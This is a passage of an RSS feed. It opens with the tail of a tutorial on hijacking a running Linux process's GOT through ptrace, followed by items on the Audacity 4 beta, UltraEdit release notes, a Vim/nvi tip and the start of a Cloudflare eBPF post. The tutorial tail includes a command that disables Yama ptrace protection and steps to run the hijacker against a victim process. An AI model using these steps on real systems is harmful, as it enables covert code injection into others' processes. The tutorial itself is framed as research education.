hack.c&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-24.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;On some systems ptrace across unrelated processes requires either root or relaxing the Yama LSM scope:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-23_1.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Now run the hijacker in a second terminal, passing the victim’s PID:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;./hack &amp;lt;pid&amp;gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-27.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Switch back to the first terminal. The victim is still running, the loop was never interrupted, but every &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts(&amp;quot;meow&amp;quot;)&lt;/code&gt; now calls our hook shellcode:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-25.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;We can also confirm the GOT was overwritten before and after using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gdb&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;readelf&lt;/code&gt;:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;# before: shows the libc puts address
readelf -r meow | grep puts&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-30.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;# at runtime, inspect the live GOT entry
cat /proc/&amp;lt;pid&amp;gt;/maps | grep rwxp&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-35.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;It works perfectly!&lt;/p&gt;&lt;h3&gt;why this matters&lt;/h3&gt;&lt;p&gt;This technique is a foundational primitive in Linux offensive tooling. It requires no file on disk (the shellcode lives in anonymous memory), leaves a minimal footprint, and survives as long as the target process is running. Real-world malware families such as &lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti&quot;&gt;Winnti&lt;/a&gt; abuse similar in-memory patching approaches to intercept calls and hide activity.&lt;/p&gt;&lt;p&gt;From a defensive perspective, GOT integrity can be monitored with tools that compare the runtime GOT entries against the expected libc addresses.&lt;/p&gt;&lt;p&gt;I hope this post with practical examples is useful for malware researchers, linux programmers and everyone who is interested in linux hacking techniques.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://cocomelonc.github.io/linux/2026/03/12/linux-hacking-10.html&quot;&gt;Linux hacking part 10: Shared library injection and hijacking. Simple C examples&lt;/a&gt;  &lt;br/&gt;
&lt;a href=&quot;https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html&quot;&gt;Linux malware development 3: linux process injection with ptrace. Simple C example&lt;/a&gt;  &lt;br/&gt;
&lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti&quot;&gt;Winnti&lt;/a&gt;  &lt;br/&gt;
&lt;a href=&quot;https://github.com/cocomelonc/meow/tree/master/2026-06-17-linux-hacking-11&quot;&gt;source code in github&lt;/a&gt;&lt;/p&gt;&lt;blockquote&gt;
  &lt;p&gt;This is a practical case for educational purposes only.&lt;/p&gt;
&lt;/blockquote&gt;&lt;p&gt;Thanks for your time happy hacking and good bye!
&lt;em&gt;PS. All drawings and screenshots are mine&lt;/em&gt;&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Beta do Audacity 4</title>
<link>https://manualdousuario.net/audacity-4-beta-download/</link>
<guid isPermaLink="false">Z7apL8La2nZjODqLdFI4hkHCZL8F2BeDObIaMg==</guid>
<pubDate>Fri, 19 Jun 2026 18:17:58 +0000</pubDate>
<description>Já está disponível o beta do Audacity 4, nova versão — com visual e ícone novos — do tradicional editor de áudio FOSS (Linux, macOS e Windows).</description>
<content:encoded>&lt;p&gt;Já está disponível o &lt;a href=&quot;https://www.audacityteam.org/next/&quot;&gt;beta do Audacity 4&lt;/a&gt;, nova versão — com visual e ícone novos — do tradicional editor de áudio FOSS (Linux, macOS e Windows). Faça becape de projetos feitos na versão 3.x: esses abrem no Audacity 4, mas alterações salvas (ou novos projetos) nele não têm retrocompatibilidade com o Audacity 3.x, &lt;a href=&quot;https://www.omgubuntu.co.uk/2026/06/audacity-4-0-beta&quot;&gt;segundo o &lt;cite&gt;Omg! Ubuntu&lt;/cite&gt;&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Lower CPU usage, better stability, and smoother editing: What’s new in UltraEdit 2025.0 for macOS</title>
<link>https://www.ultraedit.com/blog/new-release-ultraedit-2025-0-macos-linux/</link>
<guid isPermaLink="false">bsBtiL-90rM0wp959NOvkkFNYKsWkUWljMYVWA==</guid>
<pubDate>Fri, 19 Jun 2026 18:07:24 +0000</pubDate>
<description>We know our macOS users have been waiting for more attention on these platforms. UltraEdit for Windows has traditionally been the most mature version of the product, and we know there is still work to do to bring the macOS experience closer to that level. UltraEdit 2025.0 for macOS is an important step in that […] The post Lower CPU usage, better stability, and smoother editing: What’s new in UltraEdit 2025.0 for macOS appeared first on UltraEdit.</description>
<content:encoded>&lt;p&gt;&lt;span&gt;We know our macOS users have been waiting for more attention on these platforms. &lt;/span&gt;&lt;span&gt;&lt;a href=&quot;https://www.ultraedit.com/blog/new-release-ultraedit-2026-0-ultraeditstudio-2026-0/&quot;&gt;UltraEdit for Windows&lt;/a&gt; has traditionally been the most mature version of the product, and we know there is still work to do to bring the macOS experience closer to that level.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;UltraEdit 2025.0 for macOS is an important step in that direction.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release is focused on stability, reliability, performance, and the core editing experience. You’ll find lower CPU usage in specific editing scenarios, fewer interruptions, better handling of multi-file workflows, improved terminal compatibility, more predictable search and replace behavior, and a range of UI and platform-specific refinements. &lt;/span&gt;&lt;span&gt;It is not the final step. But it is a meaningful one.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;Let’s take a closer look at what’s new in UltraEdit 2025.0 for macOS.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Better stability and lower CPU usage&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;One of the biggest areas of improvement in UltraEdit 2025.0 is stability.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release includes fixes for repeated crashes while editing on macOS, crashes when modifying settings, crashes related to wordfile paths, and startup crashes with certain configurations.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;We also addressed a hang that could lead to 100% CPU usage while editing. In affected scenarios, &lt;strong&gt;CPU usage has been reduced by at least 50%&lt;/strong&gt;, helping UltraEdit feel more stable and responsive during longer editing sessions.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://www.ultraedit.com/wp-content/uploads/2026/05/Frame-3.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release also improves behavior around multi-file workflows, including a hang that could happen when working with multiple open files, invoking New Window, and closing windows.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;If you use UltraEdit for larger editing sessions, longer-running work, or multiple open files, these improvements should make the experience feel smoother and more dependable.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Smoother everyday editing behavior&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 also includes several improvements to the core editing experience on macOS.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;These are the kinds of updates that make daily work feel more predictable: how navigation behaves, how selections work, how files are detected, how dialogs respond, and how UltraEdit handles specific characters and editing modes.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release includes improvements such as:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;Better arrow key navigation at file boundaries while editing&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved detection of files that are already open&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved behavior when replacing “En space” characters in ASCII and hex mode&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved undo behavior in hex mode&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved Replace All behavior for umlauted characters in UTF-8 files&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved regular expression behavior where “Perl” was sometimes not shown as an option&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved double-click selection behavior for quoted strings and strings containing &lt;/span&gt;&lt;span&gt;$&lt;/span&gt;&lt;span&gt; and &lt;/span&gt;&lt;span&gt;&amp;gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved behavior when switching from hex mode back to normal edit mode&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Fixed a spelling issue in the Hex Find/Replace dialog&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span&gt;Together, these changes help make UltraEdit feel more consistent across the editing workflows you use every day.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Better file tabs and multi-file workflows&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;This release also improves how UltraEdit behaves when working with multiple files and tabs.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;If you often keep many files open at once, you’ll notice improvements around tab sorting, multiline tabs, file detection, and unexpected tab behavior.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 adds &lt;/span&gt;&lt;b&gt;Sort File Tabs&lt;/b&gt;&lt;span&gt; to the list of commands that can be added to the toolbar, giving you quicker access to tab organization.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;It also includes fixes for:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;Multiline tabs behaving unexpectedly when a new file forces a second row of tabs&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Screen splits appearing unexpectedly when clicking one of several open file tabs&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Blank edit files being created unexpectedly after clicking through the tab bar row&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Favorite Files dialog sizing and resizing behavior&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit creating Edit files in the user’s home directory when it should not&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit appending &lt;/span&gt;&lt;span&gt;.s&lt;/span&gt;&lt;span&gt; to newly created files saved with a &lt;/span&gt;&lt;span&gt;.sql&lt;/span&gt;&lt;span&gt; extension&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span&gt;The goal is to make multi-file work feel cleaner, especially when your editing session starts to grow.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;More flexible commands, toolbars, and project files&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 adds a few useful workflow improvements for users who customize their setup or move between systems.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;On macOS, you can now move custom toolbars above the edit window, giving you more flexibility in how your workspace is arranged.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release also adds support for specifying line and column position from the command line, which is useful when opening files directly at a specific location.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;Project files are now more portable, too. They can be created on one system and moved to another more easily, helping users who work across machines or environments.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;JSON, live preview, and markdown refinements&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 also improves several content-specific editing workflows.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;You can now use &lt;/span&gt;&lt;b&gt;Reformat JSON&lt;/b&gt;&lt;span&gt; and &lt;/span&gt;&lt;b&gt;Compress JSON&lt;/b&gt;&lt;span&gt; on files even when JSON syntax highlighting has not been applied. This makes JSON cleanup easier when working with files that contain JSON-like content but are not formally detected or highlighted as JSON.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;For markdown users, this release includes improvements to bold text highlighting and live preview behavior, including cases where live preview did not display content as expected or rendered incorrectly after adding and saving a blank line.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;These updates help make UltraEdit more dependable for structured content, documentation, markdown files, and JSON cleanup.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;macOS-specific improvements&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 includes several refinements specifically for macOS users.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;The release adds support for macOS dictation and transcription, making it easier to use system-level input features inside UltraEdit.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;It also improves several macOS application behavior issues, including:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;UltraEdit not coming to the foreground when its icon is clicked in the menu bar&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit not remembering the desktop it is assigned to&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit not adjusting size when Mission Control is invoked&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Crashes when modifying settings on macOS&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Support for moving custom toolbars above the edit window&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span&gt;These changes are part of making UltraEdit feel more natural and reliable on macOS.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;An important step for macOS&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 for macOS is focused on the things that matter most for these platforms right now: stability, reliability, performance, and smoother everyday editing. &lt;/span&gt;&lt;span&gt;We know there is still work to do. This release does not close every gap between Windows and macOS, b&lt;/span&gt;&lt;span&gt;ut it does represent a clear step forward.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;With lower CPU usage in affected scenarios, improved editing stability, better multi-file behavior, stronger terminal compatibility, more predictable search and replace behavior, and platform-specific refinements for macOS, UltraEdit 2025.0 gives you a more dependable experience across both platforms. &lt;/span&gt;&lt;span&gt;And it is just the beginning of our renewed focus on making UltraEdit better across every operating system you use.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Download UltraEdit 2025.0 for macOS&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 for macOS is available now.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;Update today to get the latest stability, performance, editing, terminal, toolbar, and platform-specific improvements.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.ultraedit.com/downloads/uex-download/&quot;&gt;&lt;b&gt;Download UltraEdit 2025.0 for macOS&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;The post &lt;a href=&quot;https://www.ultraedit.com/blog/new-release-ultraedit-2025-0-macos-linux/&quot;&gt;Lower CPU usage, better stability, and smoother editing: What’s new in UltraEdit 2025.0 for macOS&lt;/a&gt; appeared first on &lt;a href=&quot;https://www.ultraedit.com&quot;&gt;UltraEdit&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Vim Carnival Entry: &quot;The Motion that Changed Everything.&quot;</title>
<link>https://rldane.space/vim-carnival-entry-the-motion-that-changed-everything.html</link>
<guid isPermaLink="false">y8BTQGBud9i-B8z41hZlotRXz5qq5igGDIAwKQ==</guid>
<pubDate>Fri, 19 Jun 2026 13:02:39 +0000</pubDate>
<description>Vim Carnival Entry: &quot;The Motion that Changed Everything.&quot;</description>
<content:encoded>&lt;header&gt;
        &lt;h3&gt;&lt;a href=&quot;https://rldane.space/vim-carnival-entry-the-motion-that-changed-everything.html&quot;&gt;Vim Carnival Entry: &amp;quot;The Motion that Changed Everything.&amp;quot;&lt;/a&gt;&lt;/h3&gt;
    &lt;/header&gt;&lt;h6&gt;Tue 02 June 2026
&lt;/h6&gt;&lt;p&gt;&lt;a href=&quot;https://rldane.space/on-the-fediverse-and-fedifriends.html&quot;&gt;Fedifriend&lt;/a&gt; and fellow vim-addict &lt;a href=&quot;https://lazybea.rs/&quot;&gt;Hyde&lt;/a&gt; is hosting what&amp;#39;s called a &amp;quot;&lt;a href=&quot;https://lazybea.rs/carnivals/&quot;&gt;Vim Carnival&lt;/a&gt;&amp;quot;, where someone sets a topic and encourages others to blog about the subject at hand concerning &lt;a href=&quot;https://en.wikipedia.org/wiki/Vim_(text_editor)&quot;&gt;vim&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;With permission, I&amp;#39;m going to slightly modify the subject to apply to nvi, but the option I will be explain also works in vim.&lt;/p&gt;&lt;p&gt;First, a little background (read: ADHD oversplaining go BRRRR!)...&lt;/p&gt;&lt;h3&gt;Background&lt;/h3&gt;&lt;p&gt;I&amp;#39;ve been using vi and vi-inspired text editors for over a quarter century. I think I probably first tried it on a &lt;a href=&quot;https://en.wikipedia.org/wiki/VT320&quot;&gt;VT320&lt;/a&gt;, couldn&amp;#39;t figure out how to quit, and never wanted to try it again 😄. Then, either in 1998, when taking a class on Unix Shell programming, or in 2000 (when I switched my personal laptop over to Linux full-time for the first time) I decided to sit down and properly learn vi/vim, and managed to learn the basics well enough to get around, though not particularly gracefully.&lt;/p&gt;&lt;p&gt;I distinctly remember being asked to create a document when I started working as a Unix Security Analyst in 2002. Being extremely wary of Microsoft products, I created the document in vi on an HP-UX test server I had access to. I then &lt;code&gt;scp&lt;/code&gt;ed the hand-created HTML document from the server onto my Windows 2000 workstation, opened it up in Word, and saved it as a &lt;code&gt;.doc&lt;/code&gt; for others&amp;#39; use. (No, we didn&amp;#39;t have any way of creating &lt;code&gt;.PDF&lt;/code&gt;s at that time).&lt;/p&gt;&lt;p&gt;vi/vim was my daily-driver and preferred word-massager from the dawn of the 21st century until now, although I confess with measurable remorse that I did use Microsoft Word a good bit in college from 2013-2017, but I&amp;#39;ve recovered now. 😅&lt;/p&gt;&lt;h3&gt;Slow Progress&lt;/h3&gt;&lt;p&gt;The thing with vim is, its feature list is &lt;em&gt;EXPANSIVE&lt;/em&gt;. That&amp;#39;s not vim&amp;#39;s fault. I wouldn&amp;#39;t ever say it&amp;#39;s too much, but it&amp;#39;s just a lot. It&amp;#39;s also not as easily discoverable as a GUI editor is. You have to do a fair bit of &lt;a href=&quot;https://en.wikipedia.org/wiki/RTFM&quot;&gt;RTFM&lt;/a&gt;, and that&amp;#39;s definitely fair. So, my vim skills largely languished and didn&amp;#39;t really progress beyond the basics for many, many years.&lt;/p&gt;&lt;p&gt;My skills &lt;em&gt;have&lt;/em&gt; grown a fair bit in the last few years thanks to kind friends online (like Hyde) who share tips and tricks, and spur on my desire to learn more, to tweak, to master a skill I find both highly valuable in terms of efficiency, and highly satisfying in terms of enjoyment. With a good text editor (particularly one of the vi-derived ones, in my humble opinion), you don&amp;#39;t feel like you&amp;#39;re trying to select text or move text. It feels like your mind has &lt;em&gt;telekinetic control&lt;/em&gt; over the text on-screen. It&amp;#39;s really an amazing feeling.&lt;/p&gt;&lt;h3&gt;Progress Through Regress&lt;/h3&gt;&lt;p&gt;I&amp;#39;m not certain how I came upon this decision or why, but about a week ago, I decided to stop using neovim (an excellent vim fork with a built-in Lua JIT and greater options for macros and customization), and rewind the clock to the mid-1970s by switching my editor to the old-timey &lt;a href=&quot;https://en.wikipedia.org/wiki/Vi_(text_editor)&quot;&gt;vi&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Or actually, not quite. More like mid-1990s. You see, while the original 1976 vi&amp;#39;s source code is out there and is &lt;a href=&quot;https://rldane.space/what-is-foss.html&quot;&gt;FOSS&lt;/a&gt;, for the longest time, it was encumbered by a very restrictive license due to using some small portions of its code coming from the original AT&amp;amp;T Unix. So, even though it was developed at the UC Berkeley &lt;a href=&quot;https://en.wikipedia.org/wiki/CSRG&quot;&gt;CSRG&lt;/a&gt;, it couldn&amp;#39;t be distributed with the freely-available BSDs. Instead Keith Bostic developed &lt;a href=&quot;https://en.wikipedia.org/wiki/Nvi&quot;&gt;nvi&lt;/a&gt; in 1994 to be a very close clone of the original, and &lt;em&gt;that&lt;/em&gt; is the version that has been either pre-installed on, or available for nearly every Linux Distro and BSD variant since the 1990s.&lt;/p&gt;&lt;p&gt;So, I had a certain desire to pare things down and enjoy minimalism a bit more. I recall reading how &lt;a href=&quot;https://en.wikipedia.org/wiki/Rob_Pike&quot;&gt;Rob Pike&lt;/a&gt; decided not to add syntax highlighting to &lt;a href=&quot;https://en.wikipedia.org/wiki/Acme_(text_editor)&quot;&gt;Acme&lt;/a&gt; because it&amp;#39;s &lt;a href=&quot;http://acme.cat-v.org/faq&quot;&gt;distracting&lt;/a&gt;. I can&amp;#39;t say for sure if syntax highlighting is distracting or not, given that I&amp;#39;ve enjoyed it for years, going all the way back to Think Pascal for the Macintosh in the very early 1990s, which placed &lt;a href=&quot;https://en.wikipedia.org/wiki/Reserved_word&quot;&gt;reserved words&lt;/a&gt; in boldface. I do think highlighting can be helpful for spotting obvious errors in code (as long as the syntax highlighting is accurate; sometimes it isn&amp;#39;t), but I have been enjoying the exercise of reading code (shell scripts, in my case) more carefully without it, and I think my eye for code is keener for it.&lt;/p&gt;&lt;p&gt;I&amp;#39;ve found the process of &amp;quot;regressing&amp;quot; back to nvi ironically very &lt;em&gt;liberating&lt;/em&gt;, because while it&amp;#39;s more limited than vim, it&amp;#39;s far easier to fully comprehend (understand &lt;em&gt;and&lt;/em&gt; completely wrap your mind around) its feature set vs. something more sophisticated like vim. That makes the experience of learning it a lot less stressful/intimidating. But for its simplicity, &amp;quot;vanilla&amp;quot; vi actually has more features than I ever realized (including multi-level undo!).&lt;/p&gt;&lt;p&gt;The manual page is fairly long (30 pages when converted to PDF), and relatively terse, but still quite doable, and as you start pecking at it over several days to pick up different options and capabilities, a more complete feature of what it can and can&amp;#39;t do begins to develop in your mind.&lt;/p&gt;&lt;h4&gt;The Motion that Changed Everything: &lt;code&gt;~&lt;/code&gt;&lt;/h4&gt;&lt;p&gt;My most recent discovery in nvi (which I now realized also works in vim) is &lt;code&gt;set tildeop&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The tilde (&lt;code&gt;~&lt;/code&gt;) command in vi/vim is a powerful one because it can reverse the case of the text under the cursor, or the text highlighted. Many people have posted their own favorite combination command using the tilde, and the one I used most often was &lt;code&gt;0v$~&lt;/code&gt;, which jumps to the beginning of the line, marks to the end of the line, and toggles the case. This is useful for a variety of reasons, including just &lt;code&gt;ALL CAPS&lt;/code&gt;ing text when you don&amp;#39;t feel like using the dreaded* Caps Lock.&lt;/p&gt;&lt;p&gt;&lt;em&gt;* &amp;quot;Dreaded&amp;quot; for two reasons: one, I swap Caps Lock with Escape on my machines, so it&amp;#39;s a little harder to reach, and two, leaving Caps Lock on and going into command mode in vi can have disastrous and unintended consequences.&lt;/em&gt; 😆&lt;/p&gt;&lt;p&gt;But while &lt;code&gt;0v$~&lt;/code&gt; works well in vim, it doesn&amp;#39;t work in classic vi, because there&amp;#39;s no selection mode (although you can use marks to select a range of lines for certain operations, like &lt;code&gt;:&amp;#39;a,&amp;#39;bs/foo/bar/&lt;/code&gt;). What I found is if you use &lt;code&gt;set tildeop&lt;/code&gt;, the tilde no longer functions as a single-element toggle (in this case, always toggling the case of a single character, because that&amp;#39;s all you can really &amp;quot;select&amp;quot; in classic vi), but a toggle combined with a movement key!&lt;/p&gt;&lt;p&gt;So, while just toggling the case of a single character goes from &lt;code&gt;~&lt;/code&gt; to the slightly more cumbersome &lt;code&gt;~l&lt;/code&gt; (and I will admit to being annoyed at this at times 🙃), toggling the case of a whole word or line is a simple &lt;code&gt;~w&lt;/code&gt; or &lt;code&gt;~$&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;What&amp;#39;s funny is that I just found out that even if you &lt;em&gt;don&amp;#39;t&lt;/em&gt; have &lt;code&gt;tildeop&lt;/code&gt; set, you can still do something simple like &lt;code&gt;0999~&lt;/code&gt;, which will toggle the case of the entire line, as long as it isn&amp;#39;t longer than 999 characters. (&lt;em&gt;RTFM folks!&lt;/em&gt; 😂)  &lt;br/&gt;
But I still like being able to combine the tilde with movement characters, so it&amp;#39;s definitely staying. ;)  &lt;br/&gt;
I&amp;#39;ve also discovered that with &lt;code&gt;tildeop&lt;/code&gt; set, a quick &lt;code&gt;~~&lt;/code&gt; will toggle the case of the entire line, so that&amp;#39;s even faster! :D&lt;/p&gt;&lt;h3&gt;Update&lt;/h3&gt;&lt;p&gt;I&amp;#39;ve since found out that I can re-map the backtick key to work as a single-character case toggle (like the tilde key used to work), so now I get the best of both worlds.&lt;/p&gt;&lt;p&gt;Here&amp;#39;s the pertinent part of my &lt;code&gt;.exrc&lt;/code&gt; (whould work in &lt;code&gt;.vimrc&lt;/code&gt;/&lt;code&gt;init.vim&lt;/code&gt;, as well):&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;set tildeop
map ` ~l&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Live-patching security vulnerabilities inside the Linux kernel with eBPF Linux Security Module</title>
<link>https://blog.cloudflare.com/live-patch-security-vulnerabilities-with-ebpf-lsm/</link>
<enclosure type="image/jpeg" length="0" url="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1T1WbFDlQxnohg7e9qiK4s/727f5c10f363e77cbbb6c4c29ba495c8/live-patch-security-vulnerabilities-with-ebpf-lsm-0JAtqD.png"></enclosure>
<guid isPermaLink="false">4GuLDoTp-GaY59XDsyEQWfxxUnemfPEUHOXRPA==</guid>
<pubDate>Fri, 19 Jun 2026 10:37:10 +0000</pubDate>
<description>Learn how to patch Linux security vulnerabilities without rebooting the hardware and how to tighten the security of your Linux operating system with eBPF Linux Security Module.</description>
<content:encoded>&lt;p&gt;&lt;a href=&quot;https://www.kernel.org/doc/html/latest/admin-guide/LSM/index.html&quot;&gt;Linux Security Modules&lt;/a&gt; (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux kernel. Until recently users looking to implement a security policy had just two options. Configure an existing LSM module such as AppArmor or SELinux, or write a custom kernel module.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.7&quot;&gt;Linux 5.7&lt;/a&gt; introduced a third way: &lt;a href=&quot;https://docs.kernel.org/bpf/prog_lsm.html&quot;&gt;LSM extended Berkeley Packet Filters (eBPF)&lt;/a&gt; (LSM BPF for short). LSM BPF allows developers to write granular policies without configuration or loading a kernel module. LSM BPF programs are verified on load, and then executed when an LSM hook is reached in a call path.&lt;/p&gt;&lt;div&gt;
      &lt;h2&gt;Let’s solve a real-world problem&lt;/h2&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;Modern operating systems provide facilities allowing &amp;quot;partitioning&amp;quot; of kernel resources. For example FreeBSD has &amp;quot;jails&amp;quot;, Solaris has &amp;quot;zones&amp;quot;. Linux is different - it provides a set of seemingly independent facilities each allowing isolation of a specific resource. These are called &amp;quot;namespaces&amp;quot; and have been growing in the kernel for years. They are the base of popular tools like Docker, lxc or firejail. Many of the namespaces are uncontroversial, like the UTS namespace which allows the host system to hide its hostname and time. Others are complex but straightforward - NET and NS (mount) namespaces are known to be hard to wrap your head around. Finally, there is this very special very curious USER namespace.&lt;/p&gt;&lt;p&gt;USER namespace is special, since it allows the owner to operate as &amp;quot;root&amp;quot; inside it. How it works is beyond the scope of this blog post, however, suffice to say 